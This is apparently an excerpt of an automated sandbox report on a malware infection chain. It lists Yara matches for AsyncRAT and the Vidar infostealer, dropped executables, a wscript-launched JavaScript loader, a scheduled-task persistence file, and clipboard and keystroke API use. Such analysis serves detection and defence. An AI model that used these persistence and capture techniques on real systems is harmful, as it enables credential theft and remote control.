Source: chrome.exe, 0000002E.00000002.3228680189.00002AD80020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 0000002E.00000003.3159463865.00002AD8002B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: chrome.exe, 0000002E.00000003.3159463865.00002AD8002B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: chrome.exe, 0000002E.00000002.3229714741.00002AD800484000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 0000002E.00000003.3159507075.00002AD8014E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chrome.exe, 0000002E.00000003.3159556397.00002AD8014EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3240967783.00002AD801490000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3159717285.00002AD8014F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160388867.00002AD801438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160508166.00002AD801504000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160461980.00002AD801454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3159507075.00002AD8014E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chrome.exe, 0000002E.00000003.3160461980.00002AD801454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3159601893.00002AD801378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3228172316.00002AD800104000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.49JL8PttH04.2019.O/rt=j/m=q_dnp
Source: chrome.exe, 0000002E.00000003.3160461980.00002AD801454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3159601893.00002AD801378000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.avVfaMsGWq0.L.W.O/m=qmd
Source: LCESjzR.exe, 0000001D.00000003.2904530156.0000000003680000.00000004.00001000.00020000.00000000.sdmp, LCESjzR.exe, 0000001D.00000003.2905998366.000000007F1FB000.00000004.00001000.00020000.00000000.sdmp, LCESjzR.tmp, 0000001E.00000000.2909770413.0000000000921000.00000020.00000001.01000000.00000014.sdmp String found in binary or memory: https://www.innosetup.com/
Source: LCESjzR.exe, 0000001D.00000003.2904530156.0000000003680000.00000004.00001000.00020000.00000000.sdmp, LCESjzR.exe, 0000001D.00000003.2905998366.000000007F1FB000.00000004.00001000.00020000.00000000.sdmp, LCESjzR.tmp, 0000001E.00000000.2909770413.0000000000921000.00000020.00000001.01000000.00000014.sdmp String found in binary or memory: https://www.remobjects.com/ps
Source: chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 0000002E.00000002.3228918464.00002AD8002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: Yara match File source: 23.3.Macromedia.com.4245ad0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.Macromedia.com.4245ad0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000003.3327002256.0000000004251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.3320167416.000000000423A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.3320167416.00000000041CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Macromedia.com PID: 6872, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Code function: 11_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 11_2_004050F9
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0099F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 28_2_0099F7C7
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0099F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 28_2_0099F55C
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Code function: 11_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 11_2_004044D1
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_009B9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 28_2_009B9FD2

System Summary

barindex
Source: 31.2.ugdKEDU.exe.3c19550.0.raw.unpack, type: UNPACKEDPE Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 23.3.Macromedia.com.4245ad0.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 23.3.Macromedia.com.4245ad0.0.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 23.3.Macromedia.com.4245ad0.0.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 34.2.ugdKEDU.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 23.3.Macromedia.com.4245ad0.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 23.3.Macromedia.com.4245ad0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 23.3.Macromedia.com.4245ad0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 34.2.ugdKEDU.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 00000022.00000002.3495642372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 00000017.00000003.3327002256.0000000004251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000017.00000003.3327002256.0000000004251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000017.00000003.3320167416.000000000423A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000017.00000003.3320167416.000000000423A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000017.00000003.3320167416.00000000041CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000017.00000003.3320167416.00000000041CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: Macromedia.com PID: 6872, type: MEMORYSTR Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE.1.dr Static PE information: section name:
Source: TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE.1.dr Static PE information: section name: .idata
Source: TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE.1.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: .idata
Source: skotes.exe.3.dr Static PE information: section name:
Source: 4db43293bc.exe.10.dr Static PE information: section name:
Source: 4db43293bc.exe.10.dr Static PE information: section name: .idata
Source: 4db43293bc.exe.10.dr Static PE information: section name:
Source: random[1].exe0.10.dr Static PE information: section name:
Source: random[1].exe0.10.dr Static PE information: section name: .idata
Source: random[1].exe0.10.dr Static PE information: section name:
Source: b191a8c87b.exe.10.dr Static PE information: section name:
Source: b191a8c87b.exe.10.dr Static PE information: section name: .idata
Source: b191a8c87b.exe.10.dr Static PE information: section name:
Source: random[1].exe1.10.dr Static PE information: section name:
Source: random[1].exe1.10.dr Static PE information: section name: .idata
Source: random[1].exe1.10.dr Static PE information: section name:
Source: 8fb472f3d3.exe.10.dr Static PE information: section name:
Source: 8fb472f3d3.exe.10.dr Static PE information: section name: .idata
Source: 8fb472f3d3.exe.10.dr Static PE information: section name:
Source: random[2].exe.10.dr Static PE information: section name:
Source: random[2].exe.10.dr Static PE information: section name: .idata
Source: random[2].exe.10.dr Static PE information: section name:
Source: 0269e2f5f3.exe.10.dr Static PE information: section name:
Source: 0269e2f5f3.exe.10.dr Static PE information: section name: .idata
Source: 0269e2f5f3.exe.10.dr Static PE information: section name:
Source: random[1].exe2.10.dr Static PE information: section name:
Source: random[1].exe2.10.dr Static PE information: section name: .idata
Source: random[1].exe2.10.dr Static PE information: section name:
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Jump to dropped file
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js"
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00994763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle, 28_2_00994763
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00981B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 28_2_00981B4D
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Code function: 11_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx, 11_2_004038AF
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0098F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 28_2_0098F20D
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe File created: C:\Windows\SchedulesAb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe File created: C:\Windows\ContainsBefore Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe File created: C:\Windows\TokenDetroit Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe File created: C:\Windows\AttacksContacted Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe File created: C:\Windows\HolyChrysler
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_0099E530 10_2_0099E530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_009D78BB 10_2_009D78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_009D7049 10_2_009D7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_009D8860 10_2_009D8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_009D31A8 10_2_009D31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_00994DE0 10_2_00994DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_009D2D10 10_2_009D2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_009D779B 10_2_009D779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_00994B30 10_2_00994B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_009C7F36 10_2_009C7F36
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Code function: 11_2_0040737E 11_2_0040737E
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Code function: 11_2_00406EFE 11_2_00406EFE
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Code function: 11_2_004079A2 11_2_004079A2
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Code function: 11_2_004049A8 11_2_004049A8
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00948017 28_2_00948017
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0092E1F0 28_2_0092E1F0
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0093E144 28_2_0093E144
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_009222AD 28_2_009222AD
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0095A26E 28_2_0095A26E
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0093C624 28_2_0093C624
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_009AC8A4 28_2_009AC8A4
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0095E87F 28_2_0095E87F
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00956ADE 28_2_00956ADE
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00992A05 28_2_00992A05
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00988BFF 28_2_00988BFF
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0093CD7A 28_2_0093CD7A
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_0094CE10 28_2_0094CE10
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00957159 28_2_00957159
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00929240 28_2_00929240
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_009B5311 28_2_009B5311
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_009296E0 28_2_009296E0
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00941704 28_2_00941704
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00947B8B 28_2_00947B8B
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00929B60 28_2_00929B60
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00947DBA 28_2_00947DBA
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Code function: 31_2_02A41F0F 31_2_02A41F0F
Source: Joe Sandbox View Dropped File: C:\ProgramData\CrossPlatformPlayer\sqlite3.dll 16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
Source: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Code function: String function: 004062CF appears 58 times
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: String function: 00940DA0 appears 46 times
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: String function: 0093FD52 appears 40 times
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1548 -ip 1548
Source: LCESjzR.tmp.29.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: LCESjzR.exe.10.dr Static PE information: Number of sections : 11 > 10
Source: LCESjzR[1].exe.10.dr Static PE information: Number of sections : 11 > 10
Source: LCESjzR.tmp.29.dr Static PE information: Number of sections : 11 > 10
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: 31.2.ugdKEDU.exe.3c19550.0.raw.unpack, type: UNPACKEDPE Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 23.3.Macromedia.com.4245ad0.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 23.3.Macromedia.com.4245ad0.0.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 23.3.Macromedia.com.4245ad0.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 34.2.ugdKEDU.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 23.3.Macromedia.com.4245ad0.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 23.3.Macromedia.com.4245ad0.0.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 23.3.Macromedia.com.4245ad0.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 34.2.ugdKEDU.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 00000022.00000002.3495642372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 00000017.00000003.3327002256.0000000004251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000017.00000003.3327002256.0000000004251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000017.00000003.3320167416.000000000423A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000017.00000003.3320167416.000000000423A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000017.00000003.3320167416.00000000041CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000017.00000003.3320167416.00000000041CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: Macromedia.com PID: 6872, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE.1.dr Static PE information: Section: ZLIB complexity 0.9982171747275205
Source: TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE.1.dr Static PE information: Section: hxbwlokj ZLIB complexity 0.9944489821858994
Source: skotes.exe.3.dr Static PE information: Section: ZLIB complexity 0.9982171747275205
Source: skotes.exe.3.dr Static PE information: Section: hxbwlokj ZLIB complexity 0.9944489821858994
Source: 4db43293bc.exe.10.dr Static PE information: Section: ZLIB complexity 0.9972219856948229
Source: 4db43293bc.exe.10.dr Static PE information: Section: ooydwvsw ZLIB complexity 0.9942503576471462
Source: tYrnx75[1].exe.10.dr Static PE information: Section: .reloc ZLIB complexity 1.002685546875
Source: tYrnx75.exe.10.dr Static PE information: Section: .reloc ZLIB complexity 1.002685546875
Source: random[1].exe0.10.dr Static PE information: Section: nmmtmocg ZLIB complexity 0.9903322292209673
Source: b191a8c87b.exe.10.dr Static PE information: Section: nmmtmocg ZLIB complexity 0.9903322292209673
Source: random[1].exe1.10.dr Static PE information: Section: ZLIB complexity 0.9987815366972477
Source: random[1].exe1.10.dr Static PE information: Section: jttzozln ZLIB complexity 0.9940163297420451
Source: 8fb472f3d3.exe.10.dr Static PE information: Section: ZLIB complexity 0.9987815366972477
Source: 8fb472f3d3.exe.10.dr Static PE information: Section: jttzozln ZLIB complexity 0.9940163297420451
Source: random[2].exe.10.dr Static PE information: Section: pddznxyl ZLIB complexity 0.9944520356547438
Source: 0269e2f5f3.exe.10.dr Static PE information: Section: pddznxyl ZLIB complexity 0.9944520356547438
Source: ugdKEDU[1].exe.10.dr Static PE information: Section: .bsS ZLIB complexity 0.9972399855212355
Source: ugdKEDU.exe.10.dr Static PE information: Section: .bsS ZLIB complexity 0.9972399855212355
Source: jrgXmS0[1].exe.10.dr Static PE information: Section: .reloc ZLIB complexity 1.002685546875
Source: jrgXmS0.exe.10.dr Static PE information: Section: .reloc ZLIB complexity 1.002685546875
Source: random[1].exe2.10.dr Static PE information: Section: ZLIB complexity 0.9972219856948229
Source: random[1].exe2.10.dr Static PE information: Section: ooydwvsw ZLIB complexity 0.9942503576471462
Source: b191a8c87b.exe.10.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random[1].exe0.10.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: ugdKEDU[1].exe.10.dr, WS36uhldRk15BMqR9l.cs Cryptographic APIs: 'CreateDecryptor'
Source: ugdKEDU.exe.10.dr, WS36uhldRk15BMqR9l.cs Cryptographic APIs: 'CreateDecryptor'
Source: 31.2.ugdKEDU.exe.3c19550.0.raw.unpack, WS36uhldRk15BMqR9l.cs Cryptographic APIs: 'CreateDecryptor'
Source: ugdKEDU[1].exe.10.dr, Program.cs Base64 encoded string: 'YzMyMTVmZTM3MmQwNWZjMDkxNzY2NTRiZGEyYzhhMDIyZjY2ZTg1MDBkN2U4OWNmYTliM2NmNTkzYjY5MjVmZQ=='
Source: ugdKEDU.exe.10.dr, Program.cs Base64 encoded string: 'YzMyMTVmZTM3MmQwNWZjMDkxNzY2NTRiZGEyYzhhMDIyZjY2ZTg1MDBkN2U4OWNmYTliM2NmNTkzYjY5MjVmZQ=='
